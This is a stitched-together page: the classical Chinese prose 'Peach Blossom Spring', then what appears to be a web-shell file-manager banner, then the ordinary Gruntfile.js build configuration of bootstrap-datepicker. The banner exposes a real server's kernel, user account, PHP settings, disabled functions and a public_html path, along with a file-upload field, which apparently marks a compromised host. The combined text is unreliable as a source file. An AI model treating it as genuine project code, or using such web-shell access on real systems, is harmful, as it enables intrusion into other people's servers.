晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。 林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。 见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝) 既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。 南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。
|
Server : Apache System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64 User : rainic ( 1014) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /home/akaindir/public_html/crm/libraries/bootstrap/js/eternicode-bootstrap-datepicker/ |
Upload File : |
module.exports = function(grunt){
'use strict';
// Force use of Unix newlines
grunt.util.linefeed = '\n';
// Project configuration.
grunt.initConfig({
//Metadata
pkg: grunt.file.readJSON('package.json'),
banner: [
'/*!',
' * Datepicker for Bootstrap v<%= pkg.version %> (<%= pkg.homepage %>)',
' *',
' * Copyright 2012 Stefan Petre',
' * Improvements by Andrew Rowls',
' * Licensed under the Apache License v2.0 (http://www.apache.org/licenses/LICENSE-2.0)',
' */'
].join('\n'),
// Task configuration.
clean: {
dist: ['dist', '*-dist.zip']
},
jshint: {
options: {
jshintrc: 'js/.jshintrc'
},
main: {
src: 'js/bootstrap-datepicker.js'
},
locales: {
src: 'js/locales/*.js'
},
gruntfile: {
options: {
jshintrc: 'grunt/.jshintrc'
},
src: 'Gruntfile.js'
}
},
jscs: {
options: {
config: 'js/.jscsrc'
},
main: {
src: 'js/bootstrap-datepicker.js'
},
locales: {
src: 'js/locales/*.js'
},
gruntfile: {
src: 'Gruntfile.js'
}
},
qunit: {
all: 'tests/tests.html'
},
concat: {
options: {
banner: '<%= banner %>',
stripBanners: true
},
main: {
src: 'js/bootstrap-datepicker.js',
dest: 'dist/js/<%= pkg.name %>.js'
}
},
uglify: {
options: {
preserveComments: 'some'
},
main: {
src: '<%= concat.main.dest %>',
dest: 'dist/js/<%= pkg.name %>.min.js'
},
locales: {
files: [{
expand: true,
cwd: 'js/locales/',
src: '*.js',
dest: 'dist/locales/',
rename: function(dest, name){
return dest + name.replace(/\.js$/, '.min.js');
}
}]
}
},
less: {
standalone: {
files: {
'dist/css/<%= pkg.name %>.standalone.css': 'build/build_standalone.less',
'dist/css/<%= pkg.name %>3.standalone.css': 'build/build_standalone3.less'
}
},
css: {
files: {
'dist/css/<%= pkg.name %>.css': 'build/build.less',
'dist/css/<%= pkg.name %>3.css': 'build/build3.less'
}
}
},
usebanner: {
options: {
position: 'top',
banner: '<%= banner %>'
},
css: {
files: {
src: 'dist/css/*.css'
}
}
},
cssmin: {
options: {
compatibility: 'ie8',
keepSpecialComments: '*',
noAdvanced: true
},
main: {
files: {
'dist/css/<%= pkg.name %>.min.css': 'dist/css/<%= pkg.name %>.css',
'dist/css/<%= pkg.name %>3.min.css': 'dist/css/<%= pkg.name %>3.css'
}
},
standalone: {
files: {
'dist/css/<%= pkg.name %>.standalone.min.css': 'dist/css/<%= pkg.name %>.standalone.css',
'dist/css/<%= pkg.name %>3.standalone.min.css': 'dist/css/<%= pkg.name %>3.standalone.css'
}
}
},
csslint: {
options: {
csslintrc: 'less/.csslintrc'
},
dist: [
'dist/css/bootstrap-datepicker.css',
'dist/css/bootstrap-datepicker3.css',
'dist/css/bootstrap-datepicker.standalone.css',
'dist/css/bootstrap-datepicker3.standalone.css'
]
},
compress: {
main: {
options: {
archive: '<%= pkg.name %>-<%= pkg.version %>-dist.zip',
mode: 'zip',
level: 9,
pretty: true
},
files: [
{
expand: true,
cwd: 'dist/',
src: '**'
}
]
}
},
'string-replace': {
js: {
files: [{
src: 'js/bootstrap-datepicker.js',
dest: 'js/bootstrap-datepicker.js'
}],
options: {
replacements: [{
pattern: '$.fn.datepicker.version = "1.4.0";',
replacement: '$.fn.datepicker.version = "' + grunt.option('newver') + '";'
}]
}
},
npm: {
files: [{
src: 'package.json',
dest: 'package.json'
}],
options: {
replacements: [{
pattern: '"version": "1.4.0",',
replacement: '"version": "' + grunt.option('newver') + '",'
}]
}
},
bower: {
files: [{
src: 'bower.json',
dest: 'bower.json'
}],
options: {
replacements: [{
pattern: '"version": "1.4.0",',
replacement: '"version": "' + grunt.option('newver') + '",'
}]
}
}
}
});
// These plugins provide necessary tasks.
require('load-grunt-tasks')(grunt, {scope: 'devDependencies'});
require('time-grunt')(grunt);
// JS distribution task.
grunt.registerTask('dist-js', ['concat', 'uglify:main', 'uglify:locales']);
// CSS distribution task.
grunt.registerTask('less-compile', ['less:standalone', 'less:css']);
grunt.registerTask('dist-css', ['less-compile', 'cssmin:main', 'cssmin:standalone', 'usebanner']);
// Full distribution task.
grunt.registerTask('dist', ['clean:dist', 'dist-js', 'dist-css']);
// Code check tasks.
grunt.registerTask('lint-js', 'Lint all js files with jshint and jscs', ['jshint', 'jscs']);
grunt.registerTask('lint-css', 'Lint all css files', ['dist-css', 'csslint:dist']);
grunt.registerTask('test', 'Lint files and run unit tests', ['lint-js', /*'lint-css',*/ 'qunit']);
// Version numbering task.
// grunt bump-version --newver=X.Y.Z
grunt.registerTask('bump-version', 'string-replace');
// Docs task.
grunt.registerTask('screenshots', 'Rebuilds automated docs screenshots', function(){
var phantomjs = require('phantomjs').path;
grunt.file.recurse('docs/_static/screenshots/', function(abspath){
grunt.file.delete(abspath);
});
grunt.file.recurse('docs/_screenshots/', function(abspath, root, subdir, filename){
if (!/.html$/.test(filename))
return;
subdir = subdir || '';
var outdir = "docs/_static/screenshots/" + subdir,
outfile = outdir + filename.replace(/.html$/, '.png');
if (!grunt.file.exists(outdir))
grunt.file.mkdir(outdir);
grunt.util.spawn({
cmd: phantomjs,
args: ['docs/_screenshots/script/screenshot.js', abspath, outfile]
});
});
});
};